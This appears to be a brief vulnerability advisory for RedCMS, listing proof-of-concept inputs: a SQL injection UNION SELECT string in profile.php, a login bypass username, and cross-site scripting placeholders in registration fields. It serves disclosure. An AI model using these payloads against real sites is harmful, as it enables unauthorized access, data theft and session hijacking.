RedCMS Multiple Input Validation Vulnerabilities

RedCMS Multiple Input Validation Vulnerabilities

These issues can be exploited with a web client.

The following proof-of-concept examples are available:

http://www.example.com/redcms/profile.php? id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15,161,7,18, 19,20/*

URL: http://www.example.com/redcms/login.php
Username: ' or 1/*
Password: any

URL: http://www.example.com/redcms/register.php
Email: aaa'>[XSS]<aaa aaa=';
Location: aaa'>[XSS]<aaa aaa=';
Website: aaa'>[XSS]<aaa aaa=';